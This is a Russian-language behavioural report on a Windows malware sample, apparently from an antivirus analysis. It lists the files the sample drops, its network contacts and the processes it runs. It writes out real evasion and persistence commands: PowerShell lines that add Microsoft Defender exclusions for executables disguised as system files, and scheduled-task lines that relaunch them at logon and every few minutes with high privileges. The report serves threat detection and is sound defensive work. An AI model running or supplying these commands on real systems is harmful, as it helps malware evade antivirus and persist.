Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\servicess
- <SYSTEM32>\tasks\lsml
- <SYSTEM32>\tasks\lsm
- <SYSTEM32>\tasks\spoolsvs
- <SYSTEM32>\tasks\services
- <SYSTEM32>\tasks\spoolsv
- <SYSTEM32>\tasks\dwmd
- <SYSTEM32>\tasks\ntoskrnl2n
- <SYSTEM32>\tasks\dwm
- <SYSTEM32>\tasks\ntoskrnl2
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\Recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\services.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\kms\lsm.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-1000-0000000FF1CE}-C\spoolsv.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ProgramFiles(x86)%\Windows NT\TableTextService\en-US\dwm.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<SYSTEM32>\ntoskrnl2.exe'
Изменения в файловой системе
Создает следующие файлы
- <SYSTEM32>\ntoskrnl2.exe
- %HOMEPATH%\desktop\eyhwtiyb.log
- nul
- %TEMP%\hqrlzy17x7.bat
- %TEMP%\bwqttlvczm
- C:\recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\c5b4cb5e9653cc
- C:\recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\services.exe
- C:\kms\101b941d020240
- C:\kms\lsm.exe
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\f3b6ecef712a24
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\spoolsv.exe
- %ProgramFiles(x86)%\windows nt\tabletextservice\en-us\6cb0b6c459d5d3
- %HOMEPATH%\desktop\gxhzolci.log
- %ProgramFiles(x86)%\windows nt\tabletextservice\en-us\dwm.exe
- %HOMEPATH%\desktop\qcoybhlj.log
- %HOMEPATH%\desktop\vipklswy.log
- %WINDIR%\temp\tarf9d0.tmp
- %WINDIR%\temp\cabf9cf.tmp
- %HOMEPATH%\desktop\adpipzbj.log
- %WINDIR%\temp\tare2c5.tmp
- %WINDIR%\temp\cabe2c4.tmp
- %WINDIR%\temp\tare246.tmp
- %WINDIR%\temp\cabe245.tmp
- %WINDIR%\temp\tarcace.tmp
- %WINDIR%\temp\cabcacd.tmp
- <SYSTEM32>\33a22f3fbfeb15
- %HOMEPATH%\desktop\nuvzrzxw.log
Удаляет следующие файлы
- %WINDIR%\temp\cabcacd.tmp
- %WINDIR%\temp\tarcace.tmp
- %WINDIR%\temp\cabe245.tmp
- %WINDIR%\temp\tare246.tmp
- %WINDIR%\temp\cabe2c4.tmp
- %WINDIR%\temp\tare2c5.tmp
- %WINDIR%\temp\cabf9cf.tmp
- %WINDIR%\temp\tarf9d0.tmp
- %TEMP%\bwqttlvczm
Сетевая активность
Подключается к
- 'localhost':49179
- 'localhost':49181
- 'ke##uth.win':443
- 'x1.#.lencr.org':80
TCP
Запросы HTTP GET
- http://x1.#.lencr.org/
Другие
- 'localhost':49179
- 'localhost':49181
- 'localhost':49182
- 'ke##uth.win':443
UDP
- DNS ASK ke##uth.win
- DNS ASK x1.#.lencr.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\ntoskrnl2.exe'
- '%ProgramFiles(x86)%\windows nt\tabletextservice\en-us\dwm.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c mode con cols=90 lines=27
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\hqrLzy17X7.bat" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /tn "ntoskrnl2n" /sc MINUTE /mo 10 /tr "'<SYSTEM32>\ntoskrnl2.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "ntoskrnl2" /sc ONLOGON /tr "'<SYSTEM32>\ntoskrnl2.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "ntoskrnl2n" /sc MINUTE /mo 12 /tr "'<SYSTEM32>\ntoskrnl2.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'%ProgramFiles(x86)%\Windows NT\TableTextService\en-US\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwm" /sc ONLOGON /tr "'%ProgramFiles(x86)%\Windows NT\TableTextService\en-US\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'%ProgramFiles(x86)%\Windows NT\TableTextService\en-US\dwm.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-1000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-1000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-1000-0000000FF1CE}-C\spoolsv.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\kms\lsm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\kms\lsm.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\kms\lsm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsm" /sc ONLOGON /tr "'C:\kms\lsm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\kms\lsm.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\services.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\services.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Recovery\4d53d3aa-5835-11ef-baad-8f07b80b2fb5\services.exe'" /f
- '<SYSTEM32>\find.exe' /i /v "md5"
- '<SYSTEM32>\find.exe' /i /v "certutil"
- '<SYSTEM32>\certutil.exe' -hashfile "<Полный путь к файлу>" MD5
- '<SYSTEM32>\cmd.exe' /c certutil -hashfile "<Полный путь к файлу>" MD5 | find /i /v "md5" | find /i /v "certutil"
- '<SYSTEM32>\mode.com' con cols=75 lines=15
- '<SYSTEM32>\cmd.exe' /c mode con cols=75 lines=15
- '<SYSTEM32>\cmd.exe' /c cls
- '<SYSTEM32>\mode.com' con cols=90 lines=27
- '<SYSTEM32>\chcp.com' 65001
- '<SYSTEM32>\ping.exe' -n 10 localhost
- '<SYSTEM32>\ntoskrnl2.exe' (со скрытым окном)
